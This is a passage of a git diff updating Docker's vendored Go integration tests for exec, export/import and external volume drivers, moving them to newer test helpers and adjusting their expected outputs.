b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_test.go @@ -4,8 +4,8 @@ package main import ( "bufio" + "context" "fmt" - "net/http" "os" "os/exec" "reflect" @@ -15,9 +15,12 @@ import ( "sync" "time" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/client" + 
"github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestExec(c *check.C) { @@ -68,7 +71,7 @@ func (s *DockerSuite) TestExecInteractive(c *check.C) { } func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) cleanedContainerID := strings.TrimSpace(out) c.Assert(waitRun(cleanedContainerID), check.IsNil) dockerCmd(c, "restart", cleanedContainerID) @@ -81,17 +84,13 @@ func (s *DockerSuite) TestExecAfterContainerRestart(c *check.C) { func (s *DockerDaemonSuite) TestExecAfterDaemonRestart(c *check.C) { // TODO Windows CI: Requires a little work to get this ported. - testRequires(c, DaemonIsLinux) - testRequires(c, SameHostDaemon) - - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top") c.Assert(err, checker.IsNil, check.Commentf("Could not run top: %s", out)) - err = s.d.Restart() - c.Assert(err, checker.IsNil, check.Commentf("Could not restart daemon")) + s.d.Restart(c) out, err = s.d.Cmd("start", "top") c.Assert(err, checker.IsNil, check.Commentf("Could not start top after daemon restart: %s", out)) @@ -134,19 +133,18 @@ func (s *DockerSuite) TestExecExitStatus(c *check.C) { runSleepingContainer(c, "-d", "--name", "top") result := icmd.RunCommand(dockerBinary, "exec", "top", "sh", "-c", "exit 23") - c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) + result.Assert(c, icmd.Expected{ExitCode: 23, Error: "exit status 23"}) } func (s *DockerSuite) TestExecPausedContainer(c *check.C) { testRequires(c, IsPausable) - defer unpauseAllContainers() - out, _ := runSleepingContainer(c, "-d", "--name", "testing") + out := 
runSleepingContainer(c, "-d", "--name", "testing") ContainerID := strings.TrimSpace(out) dockerCmd(c, "pause", "testing") - out, _, err := dockerCmdWithError("exec", "-i", "-t", ContainerID, "echo", "hello") - c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new conmmand if it is paused")) + out, _, err := dockerCmdWithError("exec", ContainerID, "echo", "hello") + c.Assert(err, checker.NotNil, check.Commentf("container should fail to exec new command if it is paused")) expected := ContainerID + " is paused, unpause the container before exec" c.Assert(out, checker.Contains, expected, check.Commentf("container should not exec new command if it is paused")) @@ -210,6 +208,7 @@ func (s *DockerSuite) TestExecTTYWithoutStdin(c *check.C) { } } +// FIXME(vdemeester) this should be a unit tests on cli/command/container package func (s *DockerSuite) TestExecParseError(c *check.C) { // TODO Windows CI: Requires some extra work. Consider copying the // runSleepingContainer helper to have an exec version. 
@@ -217,10 +216,11 @@ func (s *DockerSuite) TestExecParseError(c *check.C) { dockerCmd(c, "run", "-d", "--name", "top", "busybox", "top") // Test normal (non-detached) case first - cmd := exec.Command(dockerBinary, "exec", "top") - _, stderr, _, err := runCommandWithStdoutStderr(cmd) - c.Assert(err, checker.NotNil) - c.Assert(stderr, checker.Contains, "See 'docker exec --help'") + icmd.RunCommand(dockerBinary, "exec", "top").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: "See 'docker exec --help'", + }) } func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { @@ -229,18 +229,18 @@ func (s *DockerSuite) TestExecStopNotHanging(c *check.C) { testRequires(c, DaemonIsLinux) dockerCmd(c, "run", "-d", "--name", "testing", "busybox", "top") - err := exec.Command(dockerBinary, "exec", "testing", "top").Start() - c.Assert(err, checker.IsNil) + result := icmd.StartCmd(icmd.Command(dockerBinary, "exec", "testing", "top")) + result.Assert(c, icmd.Success) + go icmd.WaitOnCmd(0, result) type dstop struct { - out []byte + out string err error } - ch := make(chan dstop) go func() { - out, err := exec.Command(dockerBinary, "stop", "testing").CombinedOutput() - ch <- dstop{out, err} + result := icmd.RunCommand(dockerBinary, "stop", "testing") + ch <- dstop{result.Combined(), result.Error} close(ch) }() select { @@ -262,7 +262,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) { var wg sync.WaitGroup var mu sync.Mutex - execCgroups := []sort.StringSlice{} + var execCgroups []sort.StringSlice errChan := make(chan error) // exec a few times concurrently to get consistent failure for i := 0; i < 5; i++ { @@ -305,7 +305,7 @@ func (s *DockerSuite) TestExecCgroup(c *check.C) { } func (s *DockerSuite) TestExecInspectID(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") id := strings.TrimSuffix(out, "\n") out = inspectField(c, id, "ExecIDs") @@ -357,15 +357,21 @@ func (s *DockerSuite) TestExecInspectID(c *check.C) { 
} // But we should still be able to query the execID - sc, body, err := sockRequest("GET", "/exec/"+execID+"/json", nil) - c.Assert(sc, checker.Equals, http.StatusOK, check.Commentf("received status != 200 OK: %d\n%s", sc, body)) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + _, err = cli.ContainerExecInspect(context.Background(), execID) + c.Assert(err, checker.IsNil) // Now delete the container and then an 'inspect' on the exec should // result in a 404 (not 'container not running') out, ec := dockerCmd(c, "rm", "-f", id) c.Assert(ec, checker.Equals, 0, check.Commentf("error removing container: %s", out)) - sc, body, err = sockRequest("GET", "/exec/"+execID+"/json", nil) - c.Assert(sc, checker.Equals, http.StatusNotFound, check.Commentf("received status != 404: %d\n%s", sc, body)) + + _, err = cli.ContainerExecInspect(context.Background(), execID) + expected := "No such exec instance" + c.Assert(err.Error(), checker.Contains, expected) } func (s *DockerSuite) TestLinksPingLinkedContainersOnRename(c *check.C) { @@ -388,10 +394,12 @@ func (s *DockerSuite) TestRunMutableNetworkFiles(c *check.C) { // Not applicable on Windows to Windows CI. testRequires(c, SameHostDaemon, DaemonIsLinux) for _, fn := range []string{"resolv.conf", "hosts"} { - deleteAllContainers() + containers := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + if containers != "" { + cli.DockerCmd(c, append([]string{"rm", "-fv"}, strings.Split(strings.TrimSpace(containers), "\n")...)...) 
+ } - content, err := runCommandAndReadContainerFile(fn, exec.Command(dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn))) - c.Assert(err, checker.IsNil) + content := runCommandAndReadContainerFile(c, fn, dockerBinary, "run", "-d", "--name", "c1", "busybox", "sh", "-c", fmt.Sprintf("echo success >/etc/%s && top", fn)) c.Assert(strings.TrimSpace(string(content)), checker.Equals, "success", check.Commentf("Content was not what was modified in the container", string(content))) @@ -443,30 +451,27 @@ func (s *DockerSuite) TestExecWithPrivileged(c *check.C) { dockerCmd(c, "run", "-d", "--name", "parent", "--cap-drop=ALL", "busybox", "sh", "-c", `while (true); do if [ -e /exec_priv ]; then cat /exec_priv && mknod /tmp/sda b 8 0 && echo "Success"; else echo "Privileged exec has not run yet"; fi; usleep 10000; done`) // Check exec mknod doesn't work - cmd := exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16") - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) - c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("exec mknod in --cap-drop=ALL container without --privileged should fail")) + icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdb b 8 16").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // Check exec mknod does work with --privileged - cmd = exec.Command(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.IsNil) + result := icmd.RunCommand(dockerBinary, "exec", "--privileged", "parent", "sh", "-c", `echo "Running exec --privileged" > /exec_priv && mknod /tmp/sdb b 
8 16 && usleep 50000 && echo "Finished exec --privileged" > /exec_priv && echo ok`) + result.Assert(c, icmd.Success) - actual := strings.TrimSpace(out) - c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", out)) + actual := strings.TrimSpace(result.Combined()) + c.Assert(actual, checker.Equals, "ok", check.Commentf("exec mknod in --cap-drop=ALL container with --privileged failed, output: %q", result.Combined())) // Check subsequent unprivileged exec cannot mknod - cmd = exec.Command(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32") - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil, check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) - c.Assert(out, checker.Contains, "Operation not permitted", check.Commentf("repeating exec mknod in --cap-drop=ALL container after --privileged without --privileged should fail")) - + icmd.RunCommand(dockerBinary, "exec", "parent", "sh", "-c", "mknod /tmp/sdc b 8 32").Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Operation not permitted", + }) // Confirm at no point was mknod allowed - logCmd := exec.Command(dockerBinary, "logs", "parent") - out, _, err = runCommandWithOutput(logCmd) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Not(checker.Contains), "Success") + result = icmd.RunCommand(dockerBinary, "logs", "parent") + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Success") } @@ -474,13 +479,9 @@ func (s *DockerSuite) TestExecWithImageUser(c *check.C) { // Not applicable on Windows testRequires(c, DaemonIsLinux) name := "testbuilduser" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd - USER dockerio`, - true) - c.Assert(err, checker.IsNil) - + USER dockerio`)) 
dockerCmd(c, "run", "-d", "--name", "dockerioexec", name, "top") out, _ := dockerCmd(c, "exec", "dockerioexec", "whoami") @@ -498,12 +499,12 @@ func (s *DockerSuite) TestExecOnReadonlyContainer(c *check.C) { func (s *DockerSuite) TestExecUlimits(c *check.C) { testRequires(c, DaemonIsLinux) name := "testexeculimits" - runSleepingContainer(c, "-d", "--ulimit", "nproc=21", "--name", name) + runSleepingContainer(c, "-d", "--ulimit", "nofile=511:511", "--name", name) c.Assert(waitRun(name), checker.IsNil) - out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -p") + out, _, err := dockerCmdWithError("exec", name, "sh", "-c", "ulimit -n") c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, "21") + c.Assert(strings.TrimSpace(out), checker.Equals, "511") } // #15750 @@ -549,6 +550,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { exec <- true }() + count := 0 for { top := make(chan string) var out string @@ -559,7 +561,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { select { case <-time.After(time.Second * 5): - c.Error("timed out waiting for top while exec is exiting") + c.Fatal("timed out waiting for top while exec is exiting") case out = <-top: break } @@ -568,6 +570,10 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { // The initial exec process (cmd.exe) has exited, and both sleeps are currently running break } + count++ + if count >= 30 { + c.Fatal("too many retries") + } time.Sleep(1 * time.Second) } @@ -579,7 +585,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { select { case <-time.After(time.Second * 5): - c.Error("timed out waiting for inspect while exec is exiting") + c.Fatal("timed out waiting for inspect while exec is exiting") case <-inspect: break } @@ -591,7 +597,7 @@ func (s *DockerSuite) TestExecWindowsOpenHandles(c *check.C) { // The exec should exit when the background sleep exits select { case <-time.After(time.Second * 15): - 
c.Error("timed out waiting for async exec to exit") + c.Fatal("timed out waiting for async exec to exit") case <-exec: // Ensure the background sleep has actually exited out, _ := dockerCmd(c, "top", "test") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go index 5f691196f1..4c77df4f11 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_exec_unix_test.go @@ -9,7 +9,7 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" "github.com/kr/pty" ) @@ -25,7 +25,6 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { c.Assert(err, checker.IsNil) b := bytes.NewBuffer(nil) - go io.Copy(b, p) ch := make(chan error) go func() { ch <- cmd.Wait() }() @@ -33,9 +32,14 @@ func (s *DockerSuite) TestExecInteractiveStdinClose(c *check.C) { select { case err := <-ch: c.Assert(err, checker.IsNil) - output := b.String() + io.Copy(b, p) + p.Close() + bs := b.Bytes() + bs = bytes.Trim(bs, "\x00") + output := string(bs[:]) c.Assert(strings.TrimSpace(output), checker.Equals, "hello") case <-time.After(5 * time.Second): + p.Close() c.Fatal("timed out running docker exec") } } @@ -69,7 +73,7 @@ func (s *DockerSuite) TestExecTTY(c *check.C) { c.Assert(bytes.Contains(buf, []byte("hello")), checker.Equals, true, check.Commentf(string(buf[:read]))) } -// Test the the TERM env var is set when -t is provided on exec +// Test the TERM env var is set when -t is provided on exec func (s *DockerSuite) TestExecWithTERM(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon) out, _ := dockerCmd(c, "run", "-id", "busybox", "/bin/cat") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go deleted file mode 100644 index 6a49cc8cb1..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go +++ /dev/null @@ -1,36 +0,0 @@ -package main - -import ( - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestExperimentalVersionTrue(c *check.C) { - testRequires(c, ExperimentalDaemon) - - out, _ := dockerCmd(c, "version") - for _, line := range strings.Split(out, "\n") { - if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { - c.Assert(line, checker.Matches, "*true") - return - } - } - - c.Fatal(`"Experimental" not found in version output`) -} - -func (s *DockerSuite) TestExperimentalVersionFalse(c *check.C) { - testRequires(c, NotExperimentalDaemon) - - out, _ := dockerCmd(c, "version") - for _, line := range strings.Split(out, "\n") { - if strings.HasPrefix(strings.TrimSpace(line), "Experimental:") { - c.Assert(line, checker.Matches, "*false") - return - } - } - - c.Fatal(`"Experimental" not found in version output`) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go index 069dc08162..d0dac97367 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_export_import_test.go @@ -2,31 +2,15 @@ package main import ( "os" - "os/exec" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) -// export an image and try to import it into a new one -func (s *DockerSuite) TestExportContainerAndImportImage(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := "testexportcontainerandimportimage" - - dockerCmd(c, "run", 
"--name", containerID, "busybox", "true") - - out, _ := dockerCmd(c, "export", containerID) - - importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") - importCmd.Stdin = strings.NewReader(out) - out, _, err := runCommandWithOutput(importCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) - - cleanedImageID := strings.TrimSpace(out) - c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) -} - +// TODO: Move this test to docker/cli, as it is essentially the same test +// as TestExportContainerAndImportImage except output to a file. // Used to test output flag in the export command func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { testRequires(c, DaemonIsLinux) @@ -36,14 +20,15 @@ func (s *DockerSuite) TestExportContainerWithOutputAndImportImage(c *check.C) { dockerCmd(c, "export", "--output=testexp.tar", containerID) defer os.Remove("testexp.tar") - out, _, err := runCommandWithOutput(exec.Command("cat", "testexp.tar")) - c.Assert(err, checker.IsNil, check.Commentf(out)) + resultCat := icmd.RunCommand("cat", "testexp.tar") + resultCat.Assert(c, icmd.Success) - importCmd := exec.Command(dockerBinary, "import", "-", "repo/testexp:v1") - importCmd.Stdin = strings.NewReader(out) - out, _, err = runCommandWithOutput(importCmd) - c.Assert(err, checker.IsNil, check.Commentf("failed to import image repo/testexp:v1: %s", out)) + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "import", "-", "repo/testexp:v1"}, + Stdin: strings.NewReader(resultCat.Combined()), + }) + result.Assert(c, icmd.Success) - cleanedImageID := strings.TrimSpace(out) + cleanedImageID := strings.TrimSpace(result.Combined()) c.Assert(cleanedImageID, checker.Not(checker.Equals), "", check.Commentf("output should have been an image id")) } diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go index 806d87ec77..719473b13e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_external_volume_driver_unix_test.go @@ -16,7 +16,9 @@ import ( "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/volume" "github.com/go-check/check" @@ -44,18 +46,21 @@ type eventCounter struct { type DockerExternalVolumeSuite struct { ds *DockerSuite - d *Daemon + d *daemon.Daemon *volumePlugin } func (s *DockerExternalVolumeSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) + testRequires(c, SameHostDaemon) + s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) s.ec = &eventCounter{} } func (s *DockerExternalVolumeSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) + if s.d != nil { + s.d.Stop(c) + s.ds.TearDownTest(c) + } } func (s *DockerExternalVolumeSuite) SetUpSuite(c *check.C) { @@ -98,10 +103,8 @@ func newVolumePlugin(c *check.C, name string) *volumePlugin { read := func(b io.ReadCloser) (pluginRequest, error) { defer b.Close() var pr pluginRequest - if err := json.NewDecoder(b).Decode(&pr); err != nil { - return pr, err - } - return pr, nil + err := json.NewDecoder(b).Decode(&pr) + return pr, err } send := func(w http.ResponseWriter, data interface{}) { @@ -284,20 +287,15 @@ func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", 
volumePluginName) c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver")) - c.Assert(out, checker.Contains, "A volume named test already exists") + c.Assert(out, checker.Contains, "must be unique") out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test") _, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out)) c.Assert(err, check.IsNil) - - // make sure hidden --name option conflicts with positional arg name - out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2") - c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both")) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -319,8 +317,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -334,8 +331,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", 
"vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -354,8 +350,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -412,26 +407,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c * } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) - - specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec" - os.RemoveAll(specPath) - defer os.RemoveAll(specPath) + s.d.StartWithBusybox(c) + driverName := "test-external-volume-driver-retry" errchan := make(chan error) + started := make(chan struct{}) go func() { - if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil { + close(started) + if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", driverName, "busybox:latest"); err != nil { errchan <- fmt.Errorf("%v:\n%s", err, out) } close(errchan) }() - go func() { - // wait for a retry to occur, then create spec to allow plugin to register - time.Sleep(2000 * time.Millisecond) - // no need to check for an error here since it will get picked up by the timeout later - ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644) - }() + + <-started + // wait for a retry to occur, then create spec to allow plugin to register + 
time.Sleep(2 * time.Second) + p := newVolumePlugin(c, driverName) + defer p.Close() select { case err := <-errchan: @@ -440,14 +433,14 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyE c.Fatal("volume creates fail when plugin not immediately available") } - _, err = s.d.Cmd("volume", "rm", "external-volume-test") + _, err := s.d.Cmd("volume", "rm", "external-volume-test") c.Assert(err, checker.IsNil) - c.Assert(s.ec.activations, checker.Equals, 1) - c.Assert(s.ec.creations, checker.Equals, 1) - c.Assert(s.ec.removals, checker.Equals, 1) - c.Assert(s.ec.mounts, checker.Equals, 1) - c.Assert(s.ec.unmounts, checker.Equals, 1) + c.Assert(p.ec.activations, checker.Equals, 1) + c.Assert(p.ec.creations, checker.Equals, 1) + c.Assert(p.ec.removals, checker.Equals, 1) + c.Assert(p.ec.mounts, checker.Equals, 1) + c.Assert(p.ec.unmounts, checker.Equals, 1) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) { @@ -501,12 +494,11 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) { func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) { dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1") - err := s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true") var mounts []types.MountPoint - inspectFieldAndMarshall(c, "test", "Mounts", &mounts) + inspectFieldAndUnmarshall(c, "test", "Mounts", &mounts) c.Assert(mounts, checker.HasLen, 1) c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) } @@ -514,7 +506,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c // Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error. // Prior the daemon would panic in this scenario. 
func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -525,27 +517,24 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c * } // Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path` +// +// TODO(@cpuguy83): This test is testing internal implementation. In all the cases here, there may not even be a path +// available because the volume is not even mounted. Consider removing this test. func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) c.Assert(s.ec.paths, checker.Equals, 0) out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(s.ec.paths, checker.Equals, 1) + c.Assert(s.ec.paths, checker.Equals, 0) out, err = s.d.Cmd("volume", "ls") c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(s.ec.paths, checker.Equals, 1) - - out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - c.Assert(s.ec.paths, checker.Equals, 1) + c.Assert(s.ec.paths, checker.Equals, 0) } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -554,7 +543,7 @@ func (s *DockerExternalVolumeSuite) 
TestExternalVolumeDriverMountID(c *check.C) // Check that VolumeDriver.Capabilities gets called, and only called once func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) { - c.Assert(s.d.Start(), checker.IsNil) + s.d.Start(c) c.Assert(s.ec.caps, checker.Equals, 0) for i := 0; i < 3; i++ { @@ -572,14 +561,14 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c p := newVolumePlugin(c, driverName) defer p.Close() - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") c.Assert(err, checker.NotNil, check.Commentf(out)) - c.Assert(out, checker.Contains, "volume named test already exists") + c.Assert(out, checker.Contains, "must be unique") // simulate out of band volume deletion on plugin level delete(p.vols, "test") @@ -617,7 +606,7 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *c } func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) { - c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.StartWithBusybox(c) s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount") out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true") @@ -625,3 +614,18 @@ func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true") c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) } + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnCp(c *check.C) { + s.d.StartWithBusybox(c) + s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--name=test") + + out, _ := s.d.Cmd("run", "-d", "--name=test", "-v", "test:/foo", "busybox", "/bin/sh", "-c", 
